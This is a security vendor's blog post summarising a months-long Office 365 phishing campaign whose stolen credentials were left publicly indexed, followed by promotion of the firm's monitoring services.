Breach Response Hotline, Call 833.997.7327

Contact Us

Breach Response Hotline, Click to Call

Contact Us

Phishing Campaign

Over a Thousand Passwords left Unprotected after Phishing Campaign

Caleb Boma | January 21st, 2021

 

Threat actors are very intelligent when it comes to infiltrating and phishing, but this doesn’t mean they won’t make mistakes. Researchers at two security firms published a combined report where they analyzed threat actors behind a lengthy phishing campaign that left over 1,000 login credentials for Office 365 accounts exposed.

Details of the Phishing Campaign

The phishing campaign has lasted over 6 months and uses multiple sites to host their phishing pages.

The phishing campaign itself was quite successful for the threat actors as they made their way around general email protection, but the stolen credentials were publicly available by simply doing a Google search. The credentials were published on a public file which Google could index.

Those behind the attack also compromised WordPress servers so they could host the PHP page given to victims of the campaign. Using emails, the threat actors collected login and password information with fake forms. One instance discovered by the security researchers was a Xerox scan within an HTML link.

SpearTip experts don’t recommend clicking links where you don’t know the sender. For those victims who did click the link, it may have been tough to realize the dialogue box wasn’t real. A JavaScript code runs once the link is clicked and checks to make sure the credentials are valid. The credentials are then shipped off to the threat actor’s server which uses the pop-up dialog box as a diversion. It displays the Microsoft dialogue box over an image with the user’s email already implemented and the password form open.

Be wary of what you’re clicking on and realize these are the types of intrusions where entire networks can be taken down. No organization wants to experience widespread disruption because it can halt operations and diminish brand value. Leave the protection of your data and environment to a trusted firm like SpearTip.

SpearTip’s Security Operations Center (SOC) specializes in preventing malware from entering networks. Our engineers work 24/7 hours a day to monitor environments for malicious activity. As threat actors continue to be pervasive, we will remain attentive to their evolution.

If your organization experiences a breach, call our incident response hotline at 833.997.7327.

Categories

Connect With Us

Facebook Twitter Youtube Linkedin

Featured Articles

Industries Vulnerable to Cyberattacks
Industries Vulnerable to Cyberattacks in 2023
24 April 2024
Cybersecurity Health Checks
Cybersecurity Health Checks: Why Companies Need Them
22 April 2024
New Loop DoS Attack
New Loop DoS Attack Affecting Linux Systems
19 April 2024
Possible Cyberattack
Possible Cyberattack During 2024 Summer Olympics
15 April 2024

See ShadowSpear in Action

Identify, neutralize, and counter cyberattacks - provide confidence in your security posture

Schedule a Demo Today

Stay Connected With SpearTip

Inside the SOC Newsletter

View our articles that cover trending topics in cybersecurity with insights from our 24/7/365 Security Operations Center.
Subscribe

ShadowSpear Platform

Cybersecurity actors are working around the clock, shouldn’t your security team be too? Technology solutions and security controls fail for a number of reasons, poor deployment, improper implementation, or just no one monitoring the alerts.
Learn more

ShadowSpear Demo

Experience ShadowSpear for yourself. Our lightweight, integrated solution will help you sleep easier at night and provide immediate confidence in your security posture.
Schedule a Demo

24/7 Breach Response: US/CAN: 833.997.7327

Main Office: 800.236.6550

Email Us

1714 Deer Tracks Trail, Suite 150

St. Louis, MO 63131

Navigation

Connect With Us

Twitter Linkedin Facebook

©2024 SpearTip, LLC. All rights reserved.